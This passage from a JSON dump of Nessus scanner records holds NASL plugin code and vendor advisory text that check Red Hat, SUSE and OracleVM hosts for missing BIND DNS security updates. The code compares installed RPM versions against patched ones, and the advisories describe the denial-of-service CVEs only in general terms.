preg(pattern:\"^6\\.6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.6\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0079\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"bind-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"bind-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"bind-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"bind-chroot-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"bind-chroot-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"bind-debuginfo-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"bind-devel-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"bind-libs-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", 
reference:\"bind-sdb-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"bind-sdb-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"bind-utils-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"bind-utils-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:44:33", "description": "This update for bind fixes the following issues :\n\nCVE-2015-8000: Remote denial of service by mis-parsing incoming responses. (bsc#958861)\n\nCVE-2015-5722: DoS against servers performing validation on DNSSEC-signed records. (bsc#944066)\n\nCVE-2015-5477: DoS against authoritative and recursive servers.\n\nCVE-2015-8704: Specific APL data could trigger a crash. (bsc#962189)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "SUSE SLES10 Security Update : bind (SUSE-SU-2016:0227-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-libs", "p-cpe:/a:novell:suse_linux:bind-utils", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_SU-2016-0227-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0227-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88178);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2015-8704\");\n\n script_name(english:\"SUSE SLES10 Security Update : bind (SUSE-SU-2016:0227-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bind fixes the following issues :\n\nCVE-2015-8000: Remote denial of service by mis-parsing incoming\nresponses. 
(bsc#958861)\n\nCVE-2015-5722: DoS against servers performing validation on\nDNSSEC-signed records. (bsc#944066)\n\nCVE-2015-5477: DoS against authoritative and recursive servers.\n\nCVE-2015-8704: Specific APL data could trigger a crash. (bsc#962189)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=944066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958861\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962189\"\n );\n # https://download.suse.com/patch/finder/?keywords=6c9cd85bd7aa9140126fe2cf192d0ac0\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9fb3daf0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5722/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8000/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8704/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160227-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c36687c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! 
preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-chrootenv-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-devel-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-doc-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-libs-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-utils-9.6ESVR11P1-0.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:09", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix (CVE-2015-5477)\n\n - Fix (CVE-2015-4620)\n\n - Resolves: 1215687 - DNS resolution failure in high load environment with SERVFAIL and 'out of memory/success' in the log\n\n - Fix (CVE-2015-1349)\n\n - Enable RPZ-NSIP and RPZ-NSDNAME during compilation (#1176476)\n\n - Fix race condition when using isc__begin_beginexclusive (#1175321)\n\n - Sanitize SDB API to better handle database errors (#1146893)\n\n - Fix CVE-2014-8500 (#1171974)\n\n - Fix RRL slip behavior when set to 1 (#1112356)\n\n - Fix issue causing bind to hang after reload if using 
DYNDB (#1142152)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-31T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : bind (OVMSA-2015-0105)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-libs", "p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2015-0105.NASL", "href": "https://www.tenable.com/plugins/nessus/85146", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0105.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85146);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-8500\", \"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\");\n script_bugtraq_id(71590, 72673, 75588);\n\n script_name(english:\"OracleVM 3.3 : bind (OVMSA-2015-0105)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix (CVE-2015-5477)\n\n - Fix (CVE-2015-4620)\n\n - Resolves: 1215687 - DNS resolution failure in high load\n environment with SERVFAIL and 'out of memory/success' in\n the log\n\n - Fix (CVE-2015-1349)\n\n - Enable RPZ-NSIP and RPZ-NSDNAME during compilation\n (#1176476)\n\n - Fix race condition when using isc__begin_beginexclusive\n (#1175321)\n\n - Sanitize SDB API to better handle database errors\n (#1146893)\n\n - Fix CVE-2014-8500 (#1171974)\n\n - Fix RRL slip 
behavior when set to 1 (#1112356)\n\n - Fix issue causing bind to hang after reload if using\n DYNDB (#1142152)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2015-July/000353.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:43:16", "description": "Updated bind packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.4 and 6.5 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having Important security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA denial of service flaw was found in the way BIND followed DNS delegations. A remote attacker could use a specially crafted zone containing a large number of referrals which, when looked up and processed, would cause named to use excessive amounts of memory or crash. (CVE-2014-8500)\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. 
(CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477, CVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan Foote as the original reporter of CVE-2015-5477, and Hanno Bock as the original reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2016-01-29T00:00:00", "type": "nessus", "title": "RHEL 6 : bind (RHSA-2016:0078)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-sdb", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "cpe:/o:redhat:enterprise_linux:6.4", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2016-0078.NASL", "href": "https://www.tenable.com/plugins/nessus/88479", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0078. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88479);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2014-8500\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\");\n script_xref(name:\"RHSA\", value:\"2016:0078\");\n\n script_name(english:\"RHEL 6 : bind (RHSA-2016:0078)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.4 and 6.5 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA denial of service flaw was found in the way BIND followed DNS\ndelegations. A remote attacker could use a specially crafted zone\ncontaining a large number of referrals which, when looked up and\nprocessed, would cause named to use excessive amounts of memory or\ncrash. (CVE-2014-8500)\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. 
(CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain\nmalformed DNSSEC keys. A remote attacker could use this flaw to send a\nspecially crafted DNS query (for example, a query requiring a response\nfrom a zone containing a deliberately malformed key) that would cause\nnamed functioning as a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use\nthis flaw to send a query to request a cached record with a malformed\nclass attribute that would cause named functioning as an authoritative\nor recursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they\nperform authentication when making recursive queries to resolve\naddresses for servers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges\nJonathan Foote as the original reporter of CVE-2015-5477, and Hanno\nBock as the original reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe update, the BIND daemon (named) will be restarted automatically.\"\n );\n # https://kb.isc.org/article/AA-01216\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01216\"\n );\n # https://kb.isc.org/article/AA-01272\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01272\"\n );\n # https://kb.isc.org/article/AA-01287\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01287\"\n );\n # https://kb.isc.org/article/AA-01317\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8000\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
